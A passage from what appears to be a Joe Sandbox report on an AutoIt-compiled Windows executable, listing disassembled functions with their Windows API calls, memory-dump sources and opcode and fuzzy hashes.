VariantClear.OLEAUT32(?), ref: 00DD2C3A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD2C68

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: ceb6b7582adcc6e0999e4078ece06be98d5532492dca4a7ac08ea19b2a911d79
Instruction ID: b4607290b3881a78ddf7fe95b20f10b567b0628541b5fd175a4c6f9beeebf264
Opcode Fuzzy Hash: ceb6b7582adcc6e0999e4078ece06be98d5532492dca4a7ac08ea19b2a911d79
Instruction Fuzzy Hash: 5B517EB5A00209EFDB14CF58C880AAAB7F8FF5C314B15855AE959DB314D734E951CFA0

Function 00DF82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00DF833D
GetMenuItemCount.USER32(00000000), ref: 00DF8374
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DF839C
GetMenuItemID.USER32(?,?), ref: 00DF840B
GetSubMenu.USER32(?,?), ref: 00DF8419
PostMessageW.USER32(?,00000111,?,00000000), ref: 00DF846A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 9498512fa7f2d811740a986470c7452d445700c79038876eef1659e9426887d8
Instruction ID: 990c4d8f3446184b9372373082bf7f15b84691333d66fa273ef7a79cf9fc5833
Opcode Fuzzy Hash: 9498512fa7f2d811740a986470c7452d445700c79038876eef1659e9426887d8
Instruction Fuzzy Hash: E9518B35A00219EFCF01EFA4C941AAEB7F5EF48710F158459E916BB351DB30AE419BB1

Function 00DE936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DE9409
WSAGetLastError.WS2_32(00000000), ref: 00DE9416
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DE943A
_strlen.LIBCMT ref: 00DE9484
_memmove.LIBCMT ref: 00DE94CA
WSAGetLastError.WS2_32(00000000), ref: 00DE94F7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLast$_memmove_strlenselect
String ID:
API String ID: 2795762555-0
Opcode ID: b7cce27b45256bc419fef7005c09d44c9d95a1f0734eabf6f3b8a40957635bbb
Instruction ID: f5ade8d49395d8410894eefb7f1cbf83271cc16a46ba52fe07ff6fb9baffb54f
Opcode Fuzzy Hash: b7cce27b45256bc419fef7005c09d44c9d95a1f0734eabf6f3b8a40957635bbb
Instruction Fuzzy Hash: DD416F71500104AFCB14EBA5CC95EEEB7B9EF48310F10816AF516972D1DB30AE05CB70

Function 00DD54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD552E
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD5579
IsMenu.USER32(00000000), ref: 00DD5599
CreatePopupMenu.USER32 ref: 00DD55CD
GetMenuItemCount.USER32(000000FF), ref: 00DD562B
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DD565C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 694f70c96415db13dda44a54735be019a907a7c1e68ba95d50374d7021eafafd
Instruction ID: 6d72f2d504b074dcdde9a52ad3ab714c49f07fc82f823588704cd2ec2c85d782
Opcode Fuzzy Hash: 694f70c96415db13dda44a54735be019a907a7c1e68ba95d50374d7021eafafd
Instruction Fuzzy Hash: A051CE70600A46EFDF21CF68E888BADBBF5EF05318F58411AE4569A398D370D944CB71

Function 00DAB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

BeginPaint.USER32(?,?,?,?,?,?), ref: 00DAB1C1
GetWindowRect.USER32(?,?), ref: 00DAB225
ScreenToClient.USER32(?,?), ref: 00DAB242
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DAB253
EndPaint.USER32(?,?), ref: 00DAB29D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: f327e49299082f51282e12d86695d6b134a7ab7d5da98f43f6a37368e29e259d
Instruction ID: 221d7bf20856f5d154d0c1803a6ff8dfae3341c9a500848c0dc30bd88eb15fe8
Opcode Fuzzy Hash: f327e49299082f51282e12d86695d6b134a7ab7d5da98f43f6a37368e29e259d
Instruction Fuzzy Hash: C4418D71104300AFC721DF25DC84BBA7BE8EB4A735F14066AFA95962A2C7319C4A9B71

Function 00DFE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00E51810,00000000,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE21B
EnableWindow.USER32(?,00000000), ref: 00DFE23F
ShowWindow.USER32(00E51810,00000000,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE29F
ShowWindow.USER32(?,00000004,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE2B1
EnableWindow.USER32(?,00000001), ref: 00DFE2D5
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DFE2F8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4083c71f12153822d17fd62dbbaeaa50a6a1de720fd2be7b170e7cf1ca8de628
Instruction ID: 1530d4078bae16fe310ba45c8cdb562e09b09bf5fa33ae9d71b30e06600da149
Opcode Fuzzy Hash: 4083c71f12153822d17fd62dbbaeaa50a6a1de720fd2be7b170e7cf1ca8de628
Instruction Fuzzy Hash: 1F415E30605148EFDB26CF14C899BA47BE5BB06304F1D82B9EB589F2B2D731A845CB65

Function 00DFE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00DAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB5FA
Part of subcall function 00DAB58B: BeginPath.GDI32(?), ref: 00DAB611
Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB63B

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DFE9F2
LineTo.GDI32(00000000,00000003,?), ref: 00DFEA06
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DFEA14
LineTo.GDI32(00000000,00000000,?), ref: 00DFEA24
EndPath.GDI32(00000000), ref: 00DFEA34
StrokePath.GDI32(00000000), ref: 00DFEA44

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 53bcb36bec503416ced0246ab809083e1de34c04e28758e456f7e2f365b77538
Instruction ID: dee6b0be3dac226ab02e3657d2ef8efd4590e33012662c3b87c62896542a817c
Opcode Fuzzy Hash: 53bcb36bec503416ced0246ab809083e1de34c04e28758e456f7e2f365b77538
Instruction Fuzzy Hash: E511097600414DBFDF169F91DC88EEA7FADEB08354F048412FA0959170D7719E59DBA0

Function 00DCEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DCEFB6
GetDeviceCaps.GDI32(00000000,00000058), ref: 00DCEFC7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DCEFCE
ReleaseDC.USER32(00000000,00000000), ref: 00DCEFD6
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DCEFED
MulDiv.KERNEL32(000009EC,?,?), ref: 00DCEFFF

Part of subcall function 00DCA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00DCA79D,00000000,00000000,?,00DCAB73), ref: 00DCB2CA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 601798831c7f1b23c8e2098056e0989de3b248c1307207a6468ebd8bbdf253f6
Instruction ID: 5988616fc326ac4cf55337601c6c63f772b3e0e379ea5d007f3801061d30f21c
Opcode Fuzzy Hash: 601798831c7f1b23c8e2098056e0989de3b248c1307207a6468ebd8bbdf253f6
Instruction Fuzzy Hash: 4B0184B5A00319BFEB109FA69C45F5EBFB8EF48751F14806AFA04AB280D6709C00CB61

Function 00DDA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 881f096152371b28a986c443a73c19f37776771b8fb5517a7b0c802ddb38ec39
Instruction ID: b07a2c97e87769f9d7695cdbef74911856a0d3ede6f8a384a6a97cfbce487a51
Opcode Fuzzy Hash: 881f096152371b28a986c443a73c19f37776771b8fb5517a7b0c802ddb38ec39
Instruction Fuzzy Hash: F501D132105211AFD7152F99EC48DEB77AAFF89702B04812AF503A22A1DBB4AC04CB71

Function 00D91867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D91898
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D918A0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D918AB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D918B6
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D918BE
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D918C6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 59a3ccf91df189e5b8f30f74660a002ccf67e23d1057d63e94154cb9c8672c87
Instruction ID: 0cfb91810ce6748fe021255020525f61d9da1a0efe763fbdb870807d431eb855
Opcode Fuzzy Hash: 59a3ccf91df189e5b8f30f74660a002ccf67e23d1057d63e94154cb9c8672c87
Instruction Fuzzy Hash: 260167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A868CBE5

Function 00DD84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DD8504
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DD851A
GetWindowThreadProcessId.USER32(?,?), ref: 00DD8529
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8538
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8542
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DD8549

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a2ce955abb821bee7aacb527fb766fb3bbb09cc8441b1dfc6401e5754bbec151
Instruction ID: c72121b26d473e155fe82173227a1c80158296b7cf4cd438c04feaed981426e4
Opcode Fuzzy Hash: a2ce955abb821bee7aacb527fb766fb3bbb09cc8441b1dfc6401e5754bbec151
Instruction Fuzzy Hash: 0DF09A72241158BFE7211B639C0EEEF3B7CEFC6B11F004018FA05A1050EBA02A09C6B4

Function 00DDA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00DDA330
RtlEnterCriticalSection.NTDLL(?), ref: 00DDA341
TerminateThread.KERNEL32(?,000001F6,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DDA34E
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DDA35B

Part of subcall function 00DD9CCE: CloseHandle.KERNEL32(?,?,00DDA368,?,?,?,00E066D3,?,?,?,?,?,00D9E681), ref: 00DD9CD8

InterlockedExchange.KERNEL32(?,000001F6), ref: 00DDA36E
RtlLeaveCriticalSection.NTDLL(?), ref: 00DDA375

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 57dc81465e1d39c4e0ed5e8ea71d9bea62d6f5993e87c7a6deabece4c9fa58a6
Instruction ID: d69eb634ff2da0ca4489a0228a2adfd5aed808615a13186f852bb10227aaa2ef
Opcode Fuzzy Hash: 57dc81465e1d39c4e0ed5e8ea71d9bea62d6f5993e87c7a6deabece4c9fa58a6
Instruction Fuzzy Hash: 5AF05E72149211AFD3112FA9ED48DDB7B7AEF89702B048522F202A21B1DBB59845CB61

Function 00DAD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Part of subcall function 00D9BBD9: _memmove.LIBCMT ref: 00D9BC33

__swprintf.LIBCMT ref: 00DAD98F

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DAD832

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 7b11205b78f5fe9dcda1ff90be751a119f6ed9d5d803da6a34877942e6308268
Instruction ID: 866571a077545187afe575c34e21f738cdfa9f8d0aeb9c3f6c9f6e10251db202
Opcode Fuzzy Hash: 7b11205b78f5fe9dcda1ff90be751a119f6ed9d5d803da6a34877942e6308268
Instruction Fuzzy Hash: 75915A311183019FCB14EF64C886DAEBBA5EF86714F04491DF496AB2A5EB30ED45CB72

Function 00DEB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DEB4A8
CharUpperBuffW.USER32(?,?), ref: 00DEB5B7
VariantClear.OLEAUT32(?), ref: 00DEB73A

Part of subcall function 00DDA6F6: VariantInit.OLEAUT32(00000000), ref: 00DDA736
Part of subcall function 00DDA6F6: VariantCopy.OLEAUT32(?,?), ref: 00DDA73F
Part of subcall function 00DDA6F6: VariantClear.OLEAUT32(?), ref: 00DDA74B

Strings

Incorrect Parameter format, xrefs: 00DEB4E0, 00DEB6AD
AUTOIT.ERROR, xrefs: 00DEB5BD

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: cad2f6490470f3e60e4084e2659567f67be0788d4b4802b4e7b70dda90aa15ad
Instruction ID: 4f8c60209268b68738c1e6b2c636208fb32fe5dee9151682f0037af6c90ec222
Opcode Fuzzy Hash: cad2f6490470f3e60e4084e2659567f67be0788d4b4802b4e7b70dda90aa15ad
Instruction Fuzzy Hash: 8C916A746083419FCB10EF29C48095BBBE5EF89714F14896EF88A9B351DB31E945CB72

Function 00DD1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD10B8
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD10EE
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD10FF
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD1181

Strings

DllGetClassObject, xrefs: 00DD10F4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
